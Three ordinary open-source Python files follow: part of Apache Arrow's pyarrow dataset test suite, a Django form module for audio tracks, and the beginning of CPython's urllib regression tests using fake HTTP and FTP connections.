ds.write_dataset(
table, base_dir, format="feather", partitioning=partitioning
)
# check roundtrip
partitioning_read = ds.DirectoryPartitioning.discover(
["part"], infer_dictionary=True)
result = ds.dataset(
base_dir, format="ipc", partitioning=partitioning_read
).to_table()
assert result.equals(table)
@pytest.mark.parquet
def test_write_dataset_parquet(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
# using default "parquet" format string
base_dir = tempdir / 'parquet_dataset'
ds.write_dataset(table, base_dir, format="parquet")
# check that all files are present
file_paths = list(base_dir.rglob("*"))
expected_paths = [base_dir / "part-0.parquet"]
assert set(file_paths) == set(expected_paths)
# check Table roundtrip
result = ds.dataset(base_dir, format="parquet").to_table()
assert result.equals(table)
# using custom options
for version in ["1.0", "2.4", "2.6"]:
format = ds.ParquetFileFormat()
opts = format.make_write_options(version=version)
base_dir = tempdir / 'parquet_dataset_version{0}'.format(version)
ds.write_dataset(table, base_dir, format=format, file_options=opts)
meta = pq.read_metadata(base_dir / "part-0.parquet")
expected_version = "1.0" if version == "1.0" else "2.6"
assert meta.format_version == expected_version
def test_write_dataset_csv(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "chr1"])
base_dir = tempdir / 'csv_dataset'
ds.write_dataset(table, base_dir, format="csv")
# check that all files are present
file_paths = list(base_dir.rglob("*"))
expected_paths = [base_dir / "part-0.csv"]
assert set(file_paths) == set(expected_paths)
# check Table roundtrip
result = ds.dataset(base_dir, format="csv").to_table()
assert result.equals(table)
# using custom options
format = ds.CsvFileFormat(read_options=pyarrow.csv.ReadOptions(
column_names=table.schema.names))
opts = format.make_write_options(include_header=False)
base_dir = tempdir / 'csv_dataset_noheader'
ds.write_dataset(table, base_dir, format=format, file_options=opts)
result = ds.dataset(base_dir, format=format).to_table()
assert result.equals(table)
@pytest.mark.parquet
def test_write_dataset_parquet_file_visitor(tempdir):
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))
], names=["f1", "f2", "part"])
visitor_called = False
def file_visitor(written_file):
nonlocal visitor_called
if (written_file.metadata is not None and
written_file.metadata.num_columns == 3):
visitor_called = True
base_dir = tempdir / 'parquet_dataset'
ds.write_dataset(table, base_dir, format="parquet",
file_visitor=file_visitor)
assert visitor_called
@pytest.mark.parquet
def test_partition_dataset_parquet_file_visitor(tempdir):
f1_vals = [item for chunk in range(4) for item in [chunk] * 10]
f2_vals = [item*10 for chunk in range(4) for item in [chunk] * 10]
table = pa.table({'f1': f1_vals, 'f2': f2_vals,
'part': np.repeat(['a', 'b'], 20)})
root_path = tempdir / 'partitioned'
partitioning = ds.partitioning(
pa.schema([("part", pa.string())]), flavor="hive")
paths_written = []
sample_metadata = None
def file_visitor(written_file):
nonlocal sample_metadata
if written_file.metadata:
sample_metadata = written_file.metadata
paths_written.append(written_file.path)
ds.write_dataset(
table, root_path, format="parquet", partitioning=partitioning,
use_threads=True, file_visitor=file_visitor
)
expected_paths = {
root_path / 'part=a' / 'part-0.parquet',
root_path / 'part=b' / 'part-0.parquet'
}
paths_written_set = set(map(pathlib.Path, paths_written))
assert paths_written_set == expected_paths
assert sample_metadata is not None
assert sample_metadata.num_columns == 2
@pytest.mark.parquet
@pytest.mark.pandas
def test_write_dataset_arrow_schema_metadata(tempdir):
# ensure we serialize ARROW schema in the parquet metadata, to have a
# correct roundtrip (e.g. preserve non-UTC timezone)
table = pa.table({"a": [pd.Timestamp("2012-01-01", tz="Europe/Brussels")]})
assert table["a"].type.tz == "Europe/Brussels"
ds.write_dataset(table, tempdir, format="parquet")
result = pq.read_table(tempdir / "part-0.parquet")
assert result["a"].type.tz == "Europe/Brussels"
def test_write_dataset_schema_metadata(tempdir):
# ensure that schema metadata gets written
from pyarrow import feather
table = pa.table({'a': [1, 2, 3]})
table = table.replace_schema_metadata({b'key': b'value'})
ds.write_dataset(table, tempdir, format="feather")
schema = feather.read_table(tempdir / "part-0.feather").schema
assert schema.metadata == {b'key': b'value'}
@pytest.mark.parquet
def test_write_dataset_schema_metadata_parquet(tempdir):
# ensure that schema metadata gets written
table = pa.table({'a': [1, 2, 3]})
table = table.replace_schema_metadata({b'key': b'value'})
ds.write_dataset(table, tempdir, format="parquet")
schema = pq.read_table(tempdir / "part-0.parquet").schema
assert schema.metadata == {b'key': b'value'}
@pytest.mark.parquet
@pytest.mark.s3
def test_write_dataset_s3(s3_example_simple):
# write dataset with s3 filesystem
_, _, fs, _, host, port, access_key, secret_key = s3_example_simple
uri_template = (
"s3://{}:{}@{{}}?scheme=http&endpoint_override={}:{}".format(
access_key, secret_key, host, port)
)
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))],
names=["f1", "f2", "part"]
)
part = ds.partitioning(pa.schema([("part", pa.string())]), flavor="hive")
# writing with filesystem object
ds.write_dataset(
table, "mybucket/dataset", filesystem=fs, format="feather",
partitioning=part
)
# check roundtrip
result = ds.dataset(
"mybucket/dataset", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
# writing with URI
uri = uri_template.format("mybucket/dataset2")
ds.write_dataset(table, uri, format="feather", partitioning=part)
# check roundtrip
result = ds.dataset(
"mybucket/dataset2", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
# writing with path + URI as filesystem
uri = uri_template.format("mybucket")
ds.write_dataset(
table, "dataset3", filesystem=uri, format="feather", partitioning=part
)
# check roundtrip
result = ds.dataset(
"mybucket/dataset3", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
_minio_put_only_policy = """{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:PutObject",
"s3:ListBucket",
"s3:GetObjectVersion"
],
"Resource": [
"arn:aws:s3:::*"
]
}
]
}"""
@pytest.mark.parquet
@pytest.mark.s3
def test_write_dataset_s3_put_only(s3_server):
# [ARROW-15892] Testing the create_dir flag which will restrict
# creating a new directory for writing a dataset. This is
# required while writing a dataset in s3 where we have very
# limited permissions and thus we can directly write the dataset
# without creating a directory.
from pyarrow.fs import S3FileSystem
# write dataset with s3 filesystem
host, port, _, _ = s3_server['connection']
fs = S3FileSystem(
access_key='limited',
secret_key='limited123',
endpoint_override='{}:{}'.format(host, port),
scheme='http'
)
_configure_s3_limited_user(s3_server, _minio_put_only_policy)
table = pa.table([
pa.array(range(20)), pa.array(np.random.randn(20)),
pa.array(np.repeat(['a', 'b'], 10))],
names=["f1", "f2", "part"]
)
part = ds.partitioning(pa.schema([("part", pa.string())]), flavor="hive")
# writing with filesystem object with create_dir flag set to false
ds.write_dataset(
table, "existing-bucket", filesystem=fs,
format="feather", create_dir=False, partitioning=part,
existing_data_behavior='overwrite_or_ignore'
)
# check roundtrip
result = ds.dataset(
"existing-bucket", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
# Passing create_dir is fine if the bucket already exists
ds.write_dataset(
table, "existing-bucket", filesystem=fs,
format="feather", create_dir=True, partitioning=part,
existing_data_behavior='overwrite_or_ignore'
)
# check roundtrip
result = ds.dataset(
"existing-bucket", filesystem=fs, format="ipc", partitioning="hive"
).to_table()
assert result.equals(table)
# Error enforced by filesystem
with pytest.raises(OSError,
match="Bucket 'non-existing-bucket' not found"):
ds.write_dataset(
table, "non-existing-bucket", filesystem=fs,
format="feather", create_dir=True,
existing_data_behavior='overwrite_or_ignore'
)
# Error enforced by minio / S3 service
fs = S3FileSystem(
access_key='limited',
secret_key='limited123',
endpoint_override='{}:{}'.format(host, port),
scheme='http',
allow_bucket_creation=True,
)
with pytest.raises(OSError, match="Access Denied"):
ds.write_dataset(
table, "non-existing-bucket", filesystem=fs,
format="feather", create_dir=True,
existing_data_behavior='overwrite_or_ignore'
)
@pytest.mark.parquet
def test_dataset_null_to_dictionary_cast(tempdir, dataset_reader):
# ARROW-12420
table = pa.table({"a": [None, None]})
pq.write_table(table, tempdir / "test.parquet")
schema = pa.schema([
pa.field("a", pa.dictionary(pa.int32(), pa.string()))
])
fsds = ds.FileSystemDataset.from_paths(
paths=[tempdir / "test.parquet"],
schema=schema,
format=ds.ParquetFileFormat(),
filesystem=fs.LocalFileSystem(),
)
table = dataset_reader.to_table(fsds)
assert table.schema == schema
@pytest.mark.dataset
def test_dataset_join(tempdir):
t1 = pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"]
})
ds.write_dataset(t1, tempdir / "t1", format="ipc")
ds1 = ds.dataset(tempdir / "t1", format="ipc")
t2 = pa.table({
"colB": [99, 2, 1],
"col3": ["Z", "B", "A"]
})
ds.write_dataset(t2, tempdir / "t2", format="ipc")
ds2 = ds.dataset(tempdir / "t2", format="ipc")
result = ds1.join(ds2, "colA", "colB")
assert result.to_table() == pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"],
"col3": ["A", "B", None]
})
result = ds1.join(ds2, "colA", "colB", join_type="full outer")
assert result.to_table().sort_by("colA") == pa.table({
"colA": [1, 2, 6, 99],
"col2": ["a", "b", "f", None],
"col3": ["A", "B", None, "Z"]
})
@pytest.mark.dataset
def test_dataset_join_unique_key(tempdir):
t1 = pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"]
})
ds.write_dataset(t1, tempdir / "t1", format="ipc")
ds1 = ds.dataset(tempdir / "t1", format="ipc")
t2 = pa.table({
"colA": [99, 2, 1],
"col3": ["Z", "B", "A"]
})
ds.write_dataset(t2, tempdir / "t2", format="ipc")
ds2 = ds.dataset(tempdir / "t2", format="ipc")
result = ds1.join(ds2, "colA")
assert result.to_table() == pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"],
"col3": ["A", "B", None]
})
result = ds1.join(ds2, "colA", join_type="full outer", right_suffix="_r")
assert result.to_table().sort_by("colA") == pa.table({
"colA": [1, 2, 6, 99],
"col2": ["a", "b", "f", None],
"col3": ["A", "B", None, "Z"]
})
@pytest.mark.dataset
def test_dataset_join_collisions(tempdir):
t1 = pa.table({
"colA": [1, 2, 6],
"colB": [10, 20, 60],
"colVals": ["a", "b", "f"]
})
ds.write_dataset(t1, tempdir / "t1", format="ipc")
ds1 = ds.dataset(tempdir / "t1", format="ipc")
t2 = pa.table({
"colA": [99, 2, 1],
"colB": [99, 20, 10],
"colVals": ["Z", "B", "A"]
})
ds.write_dataset(t2, tempdir / "t2", format="ipc")
ds2 = ds.dataset(tempdir / "t2", format="ipc")
result = ds1.join(ds2, "colA", join_type="full outer", right_suffix="_r")
assert result.to_table().sort_by("colA") == pa.table([
[1, 2, 6, 99],
[10, 20, 60, None],
["a", "b", "f", None],
[10, 20, None, 99],
["A", "B", None, "Z"],
], names=["colA", "colB", "colVals", "colB_r", "colVals_r"])
@pytest.mark.dataset
def test_dataset_filter(tempdir):
t1 = pa.table({
"colA": [1, 2, 6],
"col2": ["a", "b", "f"]
})
ds.write_dataset(t1, tempdir / "t1", format="ipc")
ds1 = ds.dataset(tempdir / "t1", format="ipc")
result = ds1.scanner(filter=pc.field("colA") < 3)
assert result.to_table() == pa.table({
"colA": [1, 2],
"col2": ["a", "b"]
})
def test_write_dataset_with_scanner_use_projected_schema(tempdir):
"""
Ensure the projected schema is used to validate partitions for scanner
https://issues.apache.org/jira/browse/ARROW-17228
"""
table = pa.table([pa.array(range(20))], names=["original_column"])
table_dataset = ds.dataset(table)
columns = {
"renamed_column": ds.field("original_column"),
}
scanner = table_dataset.scanner(columns=columns)
ds.write_dataset(
scanner, tempdir, partitioning=["renamed_column"], format="ipc")
with (
pytest.raises(
KeyError, match=r"'Column original_column does not exist in schema"
)
):
ds.write_dataset(
scanner, tempdir, partitioning=["original_column"], format="ipc"
)
| {
"content_hash": "4b86e4b8e3b324ca296ffc7674437078",
"timestamp": "",
"source": "github",
"line_count": 4772,
"max_line_length": 79,
"avg_line_length": 36.440276613579215,
"alnum_prop": 0.6299563524696221,
"repo_name": "icexelloss/arrow",
"id": "5e2135fde42ce3ad51249e01886439f4d94e0fa9",
"size": "174685",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/pyarrow/tests/test_dataset.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Awk",
"bytes": "3709"
},
{
"name": "Batchfile",
"bytes": "31136"
},
{
"name": "C",
"bytes": "1303179"
},
{
"name": "C#",
"bytes": "1029129"
},
{
"name": "C++",
"bytes": "24357294"
},
{
"name": "CMake",
"bytes": "707501"
},
{
"name": "Cython",
"bytes": "1546990"
},
{
"name": "Dockerfile",
"bytes": "144408"
},
{
"name": "Emacs Lisp",
"bytes": "1064"
},
{
"name": "FreeMarker",
"bytes": "2312"
},
{
"name": "Go",
"bytes": "4254915"
},
{
"name": "HTML",
"bytes": "3430"
},
{
"name": "Java",
"bytes": "6990057"
},
{
"name": "JavaScript",
"bytes": "127157"
},
{
"name": "Jinja",
"bytes": "19371"
},
{
"name": "Lua",
"bytes": "8771"
},
{
"name": "MATLAB",
"bytes": "40399"
},
{
"name": "Makefile",
"bytes": "31661"
},
{
"name": "Meson",
"bytes": "69508"
},
{
"name": "Objective-C++",
"bytes": "11472"
},
{
"name": "Perl",
"bytes": "3803"
},
{
"name": "Python",
"bytes": "3019333"
},
{
"name": "R",
"bytes": "1508383"
},
{
"name": "Ruby",
"bytes": "1596677"
},
{
"name": "Shell",
"bytes": "385605"
},
{
"name": "Thrift",
"bytes": "34246"
},
{
"name": "TypeScript",
"bytes": "1075563"
},
{
"name": "Vala",
"bytes": "24798"
}
],
"symlink_target": ""
} |
from django import forms
from audiotracks.models import get_track_model
class TrackUploadForm(forms.ModelForm):
class Meta:
model = get_track_model()
fields = ('audio_file',)
class TrackEditForm(forms.ModelForm):
class Meta:
model = get_track_model()
exclude = ('user', 'created_at', 'updated_at')
widgets = {'audio_file': forms.FileInput, 'image': forms.FileInput}
def clean_slug(self):
new_slug = self.cleaned_data['slug']
if new_slug != self.instance._original_slug:
params = {'slug': new_slug}
params['user'] = self.instance.user
if get_track_model().objects.filter(**params).count():
raise forms.ValidationError("This URL is already taken.")
return new_slug
| {
"content_hash": "14c395aba7ae443ec626f8a0e38f1ca5",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 75,
"avg_line_length": 29.59259259259259,
"alnum_prop": 0.6132665832290363,
"repo_name": "amarandon/django-audiotracks",
"id": "5ab003dafc33e0c3459b598386fc5cd14e77c5b0",
"size": "799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "audiotracks/forms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "91003"
},
{
"name": "HTML",
"bytes": "12735"
},
{
"name": "JavaScript",
"bytes": "1767"
},
{
"name": "Makefile",
"bytes": "123"
},
{
"name": "Python",
"bytes": "46686"
}
],
"symlink_target": ""
} |
"""Regresssion tests for urllib"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from unittest.mock import patch
from test import support
import os
try:
import ssl
except ImportError:
ssl = None
import sys
import tempfile
from nturl2path import url2pathname, pathname2url
from base64 import b64encode
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
with support.check_warnings(
('FancyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
opener = urllib.request.FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
def fakehttp(fakedata):
class FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
if self.io_refs == 0:
io.BytesIO.close(self)
class FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = None
fakesock = FakeSocket(fakedata)
def connect(self):
self.sock = self.fakesock
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fakehttp(fakedata)
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
class FakeFTPMixin(object):
def fakeftp(self):
class FakeFtpWrapper(object):
def __init__(self, user, passwd, host, port, dirs, timeout=None,
persistent=True):
pass
def retrfile(self, file, type):
return io.BytesIO(), 0
def close(self):
pass
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
for line in self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com')
self.assertTrue(urllib.request.proxy_bypass_environment('anotherdomain.com'))
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
try:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
finally:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
with self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get a email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
